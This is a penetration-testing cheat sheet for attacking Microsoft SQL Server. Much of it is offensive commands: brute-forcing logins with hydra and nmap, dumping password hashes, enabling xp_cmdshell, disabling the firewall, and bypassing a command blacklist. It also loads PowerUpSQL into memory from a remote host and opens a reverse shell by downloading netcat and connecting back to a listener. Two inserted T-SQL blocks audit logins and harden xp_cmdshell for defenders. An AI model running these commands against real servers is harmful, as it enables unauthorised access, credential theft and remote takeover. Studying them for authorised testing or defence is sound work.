CyberWolf-Security
1433 - MSSQL

MSSQL - Microsoft SQL Server. It typically listens on TCP port 1433; a "hidden" instance listens on TCP port 2433.

Enumeration

//NMAP - enumerate the server, version and info
nmap [IP]
nmap --script ms-sql-info -p 1433 [IP]
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 [IP]

//Metasploit - enumerate mssql info
use auxiliary/admin/mssql/mssql_enum
set RHOSTS [IP]
exploit

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable

Enumerate SQL login accounts

// Metasploit - enumerate sql login accounts
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS [IP]
exploit

Enumerate domain accounts

//metasploit
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS [IP]
exploit

PowerUpSQL

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Example:

PS /opt/PowerUpSQL> Import-Module .\PowerUpSQL.psd1  
PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose 

ComputerName     : sql01.HTB.local
Instance         : sql01.HTB.local,1433
DomainAccountSid : 1500000521000221246588323062601712516458121134400
DomainAccount    : MSSQLSERVER$
DomainAccountCn  : MSSQLSERVER
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql01.HTB.local
LastLogon        : 13/01/2021 02:56
Description      : 

PS /opt/PowerUpSQL> Get-SQLInstanceDomain | Get-SQLConnectionTest

ComputerName          Instance                   Status        
------------          --------                   ------        
sql01.HTB.local       sql01.HTB.local,1433       Accessible     

Or load it directly into memory:

IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.0.1/PowerUpSQL.ps1")

Password attack

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passwd=/root/Desktop/wordlist/100-common-passwords.txt [IP]
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt [IP] mssql
hydra -l sa -P /root/Desktop/pass.txt [IP] mssql

// Metasploit
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set rhosts [IP]
msf auxiliary(scanner/mssql/mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true
msf auxiliary(scanner/mssql/mssql_login) > run

Extracting users

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=Password123,ms-sql-query.query="SELECT * FROM master..syslogins" [IP] -oN output.txt

Dump hashes

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=Password123 [IP]
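The password-guessing, user-extraction and hash-dump steps above all succeed or fail on how the SQL logins are configured. The T-SQL below is an added example, not part of the original cheat sheet or of any tool it mentions, that a defender runs as sysadmin (sqlcmd or SSMS) to find the same weaknesses first: logins exempt from password policy or expiry, blank or trivial passwords checked server-side with PWDCOMPARE (no hash is displayed), and the set of principals that could read the hashes at all. The login name in the commented ALTER LOGIN is an assumed placeholder.

```sql
-- Added example (not from the original page): login hygiene review for SQL Server.
-- Run as a sysadmin. Only flags are returned, never password hashes.

-- 1. SQL logins that bypass the Windows password policy or never expire,
--    and whether the built-in 'sa' (SID 0x01) is still enabled.
SELECT name,
       is_disabled,
       is_policy_checked,       -- 0 = complexity / lockout policy not enforced
       is_expiration_checked,   -- 0 = password never expires
       CASE WHEN sid = 0x01 THEN 'built-in sa' ELSE '' END AS note
FROM sys.sql_logins
ORDER BY is_policy_checked, is_expiration_checked, name;

-- 2. SQL logins whose password is blank or equal to the login name.
--    PWDCOMPARE hashes the candidate and compares it with the stored hash
--    inside the engine, which is exactly the check a brute-force tool makes.
SELECT name,
       CASE WHEN PWDCOMPARE('',   password_hash) = 1 THEN 'blank password'
            WHEN PWDCOMPARE(name, password_hash) = 1 THEN 'password = login name'
       END AS finding
FROM sys.sql_logins
WHERE PWDCOMPARE('',   password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1;

-- 3. Who can read password_hash at all: sysadmin members and CONTROL SERVER holders.
--    Every entry here is a login whose compromise hands over the hash set.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals sp
WHERE sp.type IN ('S', 'U', 'G')               -- SQL login, Windows login, Windows group
  AND ( IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
        OR EXISTS (SELECT 1
                   FROM sys.server_permissions p
                   WHERE p.grantee_principal_id = sp.principal_id
                     AND p.permission_name = 'CONTROL SERVER'
                     AND p.state_desc = 'GRANT') );

-- 4. Remediation for what the queries above surface (uncomment to apply).
--    [someuser] is an assumed placeholder for a login found in step 1 or 2.
-- ALTER LOGIN [someuser] WITH CHECK_POLICY = ON, CHECK_EXPIRATION = ON;
-- ALTER LOGIN [sa] DISABLE;
```

Step 2 is the defensive use that Microsoft documents for PWDCOMPARE; it finds the logins that the ms-sql-brute and hydra lines above would find in seconds, without taking the hashes anywhere. Step 3 matters because the ms-sql-dump-hashes script needs one of these accounts: shrinking that list is what makes a hash dump hard.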

CMD Shell

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=Password123,ms-sql-xp-cmdshell.cmd="ipconfig" [IP]

Enable xp_cmdshell - manual

// Enable xp_cmdshell. It is an advanced option, so 'show advanced options' must already be set to 1 (see the sqlcmd example below)
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

// Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'

// Bypass a blacklisted "EXEC xp_cmdshell" string by calling the procedure through a variable
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net'

// Connect with Windows authentication using Impacket's mssqlclient
impacket-mssqlclient machine_name/user@[IP] -windows-auth
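Everything in this section and in the mssql_exec module rests on one switch: xp_cmdshell being on. The defender's counterpart is to confirm its state, know who can flip it, turn it off, and record any attempt to use or re-enable it. The T-SQL below is an added example, not part of the original cheat sheet or of any tool it mentions; run it as sysadmin with sqlcmd or SSMS. The session name watch_xp_cmdshell and the event-file path C:\XE\ are assumed placeholders.

```sql
-- Added example (not from the original page): audit and harden xp_cmdshell.
-- Run as a sysadmin. Session name and event-file path are assumed placeholders.

-- 1. Is xp_cmdshell currently enabled? value_in_use is the live setting;
--    value is what the next RECONFIGURE would apply.
SELECT name,
       CONVERT(INT, value)        AS configured_value,
       CONVERT(INT, value_in_use) AS running_value
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Who could enable it? sp_configure + RECONFIGURE need ALTER SETTINGS,
--    which the sysadmin and serveradmin fixed roles hold implicitly.
SELECT r.name AS role_name, m.name AS member_name, m.type_desc, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
ORDER BY r.name, m.name;

-- 3. Turn xp_cmdshell off and hide the advanced options again.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

-- 4. Keep watching: an Extended Events session that records every completed
--    statement mentioning xp_cmdshell or sp_configure, with the login,
--    client host and application that issued it. Survives restarts.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = 'watch_xp_cmdshell')
    DROP EVENT SESSION watch_xp_cmdshell ON SERVER;

CREATE EVENT SESSION watch_xp_cmdshell ON SERVER
ADD EVENT sqlserver.sql_statement_completed (
    ACTION (sqlserver.sql_text, sqlserver.username,
            sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%sp_configure%')
)
ADD TARGET package0.event_file (SET filename = N'C:\XE\watch_xp_cmdshell.xel')  -- assumed path
WITH (STARTUP_STATE = ON);

ALTER EVENT SESSION watch_xp_cmdshell ON SERVER STATE = START;
```

Step 1 is the same check the cheat sheet's own `sys.configurations` query makes, split into configured and running values so a pending RECONFIGURE is visible. Step 4 catches the variable-indirection bypass above as well, because the filter runs on the batch text, not on the procedure name the engine resolves; ship the .xel file to the SIEM and alert on any hit from a host or application that is not a known administrator.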

Metasploit

// Metasploit - run a command through xp_cmdshell
use auxiliary/admin/mssql/mssql_exec
set RHOSTS [IP]
set CMD whoami
exploit

Connecting to MSSQL

Connect using one of the following options:

sqsh

sqsh -S someserver -U sa -P password

metasploit

metasploit (mssql_login)

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

mssqlclient (Impacket)

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

sqlcmd

sqlcmd: to use SQL Server Authentication, supply the user name and password with the -U and -P options.

sqlcmd -S [IP] -U admin -P Password123
    1> select @@version
    2> go
sqlcmd -y0 -d ADSync -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"

crackmapexec

cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

Using MSSQL-CLI Python utility

python3 -m mssqlcli.main -S [IP] -U sa -P Password123

Common SQL Queries

select @@version;
select loginname from syslogins where sysadmin = 1;
select name from sys.databases;
select * from sysusers;
select name, password_hash from master.sys.sql_logins;
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell "whoami"
EXEC xp_cmdshell "dir C:\"
EXEC xp_cmdshell "type C:\file.txt"

Reverse shell

Download netcat to the remote server, then launch it back to the listener, both through xp_cmdshell:

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 443"

MSSQL 2017 Commands

Current user's permissions:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
entity_name    subentity_name    permission_name 
------------   ---------------   ------------------ 
server                           CONNECT SQL 
server                           VIEW ANY DATABASE

Check out the databases available:

SQL> SELECT name FROM master.sys.databases 
name 
----------- 
master 
tempdb 
model 
msdb 
volume 

I can look for user generated tables on those databases:

SQL> use volume 
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume 
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'. 
SQL> SELECT name FROM sysobjects WHERE xtype = 'U' 
name 
------------

Last updated 2 years ago

Links:

Impacket script
https://github.com/NetSPI/PowerUpSQL
mssqlclient
MSSQL Injection Cheat Sheet (pentestmonkey)